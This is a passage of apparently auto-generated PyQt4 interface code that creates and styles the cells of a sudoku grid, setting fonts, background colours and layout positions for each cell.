self.label_3_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_3.setObjectName(_fromUtf8("label_3_3"))
self.gridLayout_5.addWidget(self.label_3_3, 0, 0, 1, 1)
self.label_5_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_3.sizePolicy().hasHeightForWidth())
self.label_5_3.setSizePolicy(sizePolicy)
self.label_5_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_3.setFont(font)
self.label_5_3.setAutoFillBackground(False)
self.label_5_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_3.setFrameShape(QtGui.QFrame.Panel)
self.label_5_3.setText(_fromUtf8(""))
self.label_5_3.setTextFormat(QtCore.Qt.PlainText)
self.label_5_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_3.setObjectName(_fromUtf8("label_5_3"))
self.gridLayout_5.addWidget(self.label_5_3, 2, 0, 1, 1)
self.label_4_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_4.sizePolicy().hasHeightForWidth())
self.label_4_4.setSizePolicy(sizePolicy)
self.label_4_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_4.setFont(font)
self.label_4_4.setAutoFillBackground(False)
self.label_4_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_4.setFrameShape(QtGui.QFrame.Panel)
self.label_4_4.setText(_fromUtf8(""))
self.label_4_4.setTextFormat(QtCore.Qt.PlainText)
self.label_4_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_4.setObjectName(_fromUtf8("label_4_4"))
self.gridLayout_5.addWidget(self.label_4_4, 1, 1, 1, 1)
self.label_4_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_3.sizePolicy().hasHeightForWidth())
self.label_4_3.setSizePolicy(sizePolicy)
self.label_4_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_3.setFont(font)
self.label_4_3.setAutoFillBackground(False)
self.label_4_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_3.setFrameShape(QtGui.QFrame.Panel)
self.label_4_3.setText(_fromUtf8(""))
self.label_4_3.setTextFormat(QtCore.Qt.PlainText)
self.label_4_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_3.setObjectName(_fromUtf8("label_4_3"))
self.gridLayout_5.addWidget(self.label_4_3, 1, 0, 1, 1)
self.label_5_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_4.sizePolicy().hasHeightForWidth())
self.label_5_4.setSizePolicy(sizePolicy)
self.label_5_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_4.setFont(font)
self.label_5_4.setAutoFillBackground(False)
self.label_5_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_4.setFrameShape(QtGui.QFrame.Panel)
self.label_5_4.setText(_fromUtf8(""))
self.label_5_4.setTextFormat(QtCore.Qt.PlainText)
self.label_5_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_4.setObjectName(_fromUtf8("label_5_4"))
self.gridLayout_5.addWidget(self.label_5_4, 2, 1, 1, 1)
self.label_3_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_5.sizePolicy().hasHeightForWidth())
self.label_3_5.setSizePolicy(sizePolicy)
self.label_3_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_5.setFont(font)
self.label_3_5.setAutoFillBackground(False)
self.label_3_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_5.setFrameShape(QtGui.QFrame.Panel)
self.label_3_5.setText(_fromUtf8(""))
self.label_3_5.setTextFormat(QtCore.Qt.PlainText)
self.label_3_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_5.setObjectName(_fromUtf8("label_3_5"))
self.gridLayout_5.addWidget(self.label_3_5, 0, 2, 1, 1)
self.label_4_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_5.sizePolicy().hasHeightForWidth())
self.label_4_5.setSizePolicy(sizePolicy)
self.label_4_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_5.setFont(font)
self.label_4_5.setAutoFillBackground(False)
self.label_4_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_5.setFrameShape(QtGui.QFrame.Panel)
self.label_4_5.setText(_fromUtf8(""))
self.label_4_5.setTextFormat(QtCore.Qt.PlainText)
self.label_4_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_5.setObjectName(_fromUtf8("label_4_5"))
self.gridLayout_5.addWidget(self.label_4_5, 1, 2, 1, 1)
self.label_5_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_5.sizePolicy().hasHeightForWidth())
self.label_5_5.setSizePolicy(sizePolicy)
self.label_5_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_5.setFont(font)
self.label_5_5.setAutoFillBackground(False)
self.label_5_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_5.setFrameShape(QtGui.QFrame.Panel)
self.label_5_5.setText(_fromUtf8(""))
self.label_5_5.setTextFormat(QtCore.Qt.PlainText)
self.label_5_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_5.setObjectName(_fromUtf8("label_5_5"))
self.gridLayout_5.addWidget(self.label_5_5, 2, 2, 1, 1)
self.label_3_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_4.sizePolicy().hasHeightForWidth())
self.label_3_4.setSizePolicy(sizePolicy)
self.label_3_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_4.setFont(font)
self.label_3_4.setAutoFillBackground(False)
self.label_3_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_4.setFrameShape(QtGui.QFrame.Panel)
self.label_3_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_4.setText(_fromUtf8(""))
self.label_3_4.setTextFormat(QtCore.Qt.PlainText)
self.label_3_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_4.setObjectName(_fromUtf8("label_3_4"))
self.gridLayout_5.addWidget(self.label_3_4, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_5, 1, 1, 1, 1)
self.gridLayout_9 = QtGui.QGridLayout()
self.gridLayout_9.setSpacing(0)
self.gridLayout_9.setObjectName(_fromUtf8("gridLayout_9"))
self.label_7_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_6.sizePolicy().hasHeightForWidth())
self.label_7_6.setSizePolicy(sizePolicy)
self.label_7_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_6.setFont(font)
self.label_7_6.setAutoFillBackground(False)
self.label_7_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_6.setFrameShape(QtGui.QFrame.Panel)
self.label_7_6.setText(_fromUtf8(""))
self.label_7_6.setTextFormat(QtCore.Qt.PlainText)
self.label_7_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_6.setObjectName(_fromUtf8("label_7_6"))
self.gridLayout_9.addWidget(self.label_7_6, 1, 0, 1, 1)
self.label_6_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_8.sizePolicy().hasHeightForWidth())
self.label_6_8.setSizePolicy(sizePolicy)
self.label_6_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_8.setFont(font)
self.label_6_8.setAutoFillBackground(False)
self.label_6_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_8.setFrameShape(QtGui.QFrame.Panel)
self.label_6_8.setText(_fromUtf8(""))
self.label_6_8.setTextFormat(QtCore.Qt.PlainText)
self.label_6_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_8.setObjectName(_fromUtf8("label_6_8"))
self.gridLayout_9.addWidget(self.label_6_8, 0, 2, 1, 1)
self.label_8_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_6.sizePolicy().hasHeightForWidth())
self.label_8_6.setSizePolicy(sizePolicy)
self.label_8_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_6.setFont(font)
self.label_8_6.setAutoFillBackground(False)
self.label_8_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_6.setFrameShape(QtGui.QFrame.Panel)
self.label_8_6.setText(_fromUtf8(""))
self.label_8_6.setTextFormat(QtCore.Qt.PlainText)
self.label_8_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_6.setObjectName(_fromUtf8("label_8_6"))
self.gridLayout_9.addWidget(self.label_8_6, 2, 0, 1, 1)
self.label_7_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_7.sizePolicy().hasHeightForWidth())
self.label_7_7.setSizePolicy(sizePolicy)
self.label_7_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_7.setFont(font)
self.label_7_7.setAutoFillBackground(False)
self.label_7_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_7.setFrameShape(QtGui.QFrame.Panel)
self.label_7_7.setText(_fromUtf8(""))
self.label_7_7.setTextFormat(QtCore.Qt.PlainText)
self.label_7_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_7.setObjectName(_fromUtf8("label_7_7"))
self.gridLayout_9.addWidget(self.label_7_7, 1, 1, 1, 1)
self.label_8_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_7.sizePolicy().hasHeightForWidth())
self.label_8_7.setSizePolicy(sizePolicy)
self.label_8_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_7.setFont(font)
self.label_8_7.setAutoFillBackground(False)
self.label_8_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_7.setFrameShape(QtGui.QFrame.Panel)
self.label_8_7.setText(_fromUtf8(""))
self.label_8_7.setTextFormat(QtCore.Qt.PlainText)
self.label_8_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_7.setObjectName(_fromUtf8("label_8_7"))
self.gridLayout_9.addWidget(self.label_8_7, 2, 1, 1, 1)
self.label_6_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_6.sizePolicy().hasHeightForWidth())
self.label_6_6.setSizePolicy(sizePolicy)
self.label_6_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_6.setFont(font)
self.label_6_6.setAutoFillBackground(False)
self.label_6_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_6.setFrameShape(QtGui.QFrame.Panel)
self.label_6_6.setLineWidth(1)
self.label_6_6.setText(_fromUtf8(""))
self.label_6_6.setTextFormat(QtCore.Qt.PlainText)
self.label_6_6.setScaledContents(False)
self.label_6_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_6.setObjectName(_fromUtf8("label_6_6"))
self.gridLayout_9.addWidget(self.label_6_6, 0, 0, 1, 1)
self.label_7_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_8.sizePolicy().hasHeightForWidth())
self.label_7_8.setSizePolicy(sizePolicy)
self.label_7_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_8.setFont(font)
self.label_7_8.setAutoFillBackground(False)
self.label_7_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_8.setFrameShape(QtGui.QFrame.Panel)
self.label_7_8.setText(_fromUtf8(""))
self.label_7_8.setTextFormat(QtCore.Qt.PlainText)
self.label_7_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_8.setObjectName(_fromUtf8("label_7_8"))
self.gridLayout_9.addWidget(self.label_7_8, 1, 2, 1, 1)
self.label_8_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_8.sizePolicy().hasHeightForWidth())
self.label_8_8.setSizePolicy(sizePolicy)
self.label_8_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_8.setFont(font)
self.label_8_8.setAutoFillBackground(False)
self.label_8_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_8.setFrameShape(QtGui.QFrame.Panel)
self.label_8_8.setText(_fromUtf8(""))
self.label_8_8.setTextFormat(QtCore.Qt.PlainText)
self.label_8_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_8.setObjectName(_fromUtf8("label_8_8"))
self.gridLayout_9.addWidget(self.label_8_8, 2, 2, 1, 1)
self.label_6_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_7.sizePolicy().hasHeightForWidth())
self.label_6_7.setSizePolicy(sizePolicy)
self.label_6_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_7.setFont(font)
self.label_6_7.setAutoFillBackground(False)
self.label_6_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_7.setFrameShape(QtGui.QFrame.Panel)
self.label_6_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_7.setText(_fromUtf8(""))
self.label_6_7.setTextFormat(QtCore.Qt.PlainText)
self.label_6_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_7.setObjectName(_fromUtf8("label_6_7"))
self.gridLayout_9.addWidget(self.label_6_7, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_9, 2, 2, 1, 1)
self.gridLayout_3 = QtGui.QGridLayout()
self.gridLayout_3.setSpacing(0)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.label_1_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_8.sizePolicy().hasHeightForWidth())
self.label_1_8.setSizePolicy(sizePolicy)
self.label_1_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_8.setFont(font)
self.label_1_8.setAutoFillBackground(False)
self.label_1_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_8.setFrameShape(QtGui.QFrame.Panel)
self.label_1_8.setText(_fromUtf8(""))
self.label_1_8.setTextFormat(QtCore.Qt.PlainText)
self.label_1_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_8.setObjectName(_fromUtf8("label_1_8"))
self.gridLayout_3.addWidget(self.label_1_8, 1, 2, 1, 1)
self.label_0_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_7.sizePolicy().hasHeightForWidth())
self.label_0_7.setSizePolicy(sizePolicy)
self.label_0_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_7.setFont(font)
self.label_0_7.setAutoFillBackground(False)
self.label_0_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_7.setFrameShape(QtGui.QFrame.Panel)
self.label_0_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_7.setText(_fromUtf8(""))
self.label_0_7.setTextFormat(QtCore.Qt.PlainText)
self.label_0_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_7.setObjectName(_fromUtf8("label_0_7"))
self.gridLayout_3.addWidget(self.label_0_7, 0, 1, 1, 1)
self.label_1_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_7.sizePolicy().hasHeightForWidth())
self.label_1_7.setSizePolicy(sizePolicy)
self.label_1_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_7.setFont(font)
self.label_1_7.setAutoFillBackground(False)
self.label_1_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_7.setFrameShape(QtGui.QFrame.Panel)
self.label_1_7.setText(_fromUtf8(""))
self.label_1_7.setTextFormat(QtCore.Qt.PlainText)
self.label_1_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_7.setObjectName(_fromUtf8("label_1_7"))
self.gridLayout_3.addWidget(self.label_1_7, 1, 1, 1, 1)
self.label_2_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_6.sizePolicy().hasHeightForWidth())
self.label_2_6.setSizePolicy(sizePolicy)
self.label_2_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_6.setFont(font)
self.label_2_6.setAutoFillBackground(False)
self.label_2_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_6.setFrameShape(QtGui.QFrame.Panel)
self.label_2_6.setText(_fromUtf8(""))
self.label_2_6.setTextFormat(QtCore.Qt.PlainText)
self.label_2_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_6.setObjectName(_fromUtf8("label_2_6"))
self.gridLayout_3.addWidget(self.label_2_6, 2, 0, 1, 1)
self.label_2_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_7.sizePolicy().hasHeightForWidth())
self.label_2_7.setSizePolicy(sizePolicy)
self.label_2_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_7.setFont(font)
self.label_2_7.setAutoFillBackground(False)
self.label_2_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_7.setFrameShape(QtGui.QFrame.Panel)
self.label_2_7.setText(_fromUtf8(""))
self.label_2_7.setTextFormat(QtCore.Qt.PlainText)
self.label_2_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_7.setObjectName(_fromUtf8("label_2_7"))
self.gridLayout_3.addWidget(self.label_2_7, 2, 1, 1, 1)
self.label_0_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_8.sizePolicy().hasHeightForWidth())
self.label_0_8.setSizePolicy(sizePolicy)
self.label_0_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_8.setFont(font)
self.label_0_8.setAutoFillBackground(False)
self.label_0_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_8.setFrameShape(QtGui.QFrame.Panel)
self.label_0_8.setText(_fromUtf8(""))
self.label_0_8.setTextFormat(QtCore.Qt.PlainText)
self.label_0_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_8.setObjectName(_fromUtf8("label_0_8"))
self.gridLayout_3.addWidget(self.label_0_8, 0, 2, 1, 1)
self.label_2_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_8.sizePolicy().hasHeightForWidth())
self.label_2_8.setSizePolicy(sizePolicy)
self.label_2_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_8.setFont(font)
self.label_2_8.setAutoFillBackground(False)
self.label_2_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_8.setFrameShape(QtGui.QFrame.Panel)
self.label_2_8.setText(_fromUtf8(""))
self.label_2_8.setTextFormat(QtCore.Qt.PlainText)
self.label_2_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_8.setObjectName(_fromUtf8("label_2_8"))
self.gridLayout_3.addWidget(self.label_2_8, 2, 2, 1, 1)
self.label_1_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_6.sizePolicy().hasHeightForWidth())
self.label_1_6.setSizePolicy(sizePolicy)
self.label_1_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_6.setFont(font)
self.label_1_6.setAutoFillBackground(False)
self.label_1_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_6.setFrameShape(QtGui.QFrame.Panel)
self.label_1_6.setText(_fromUtf8(""))
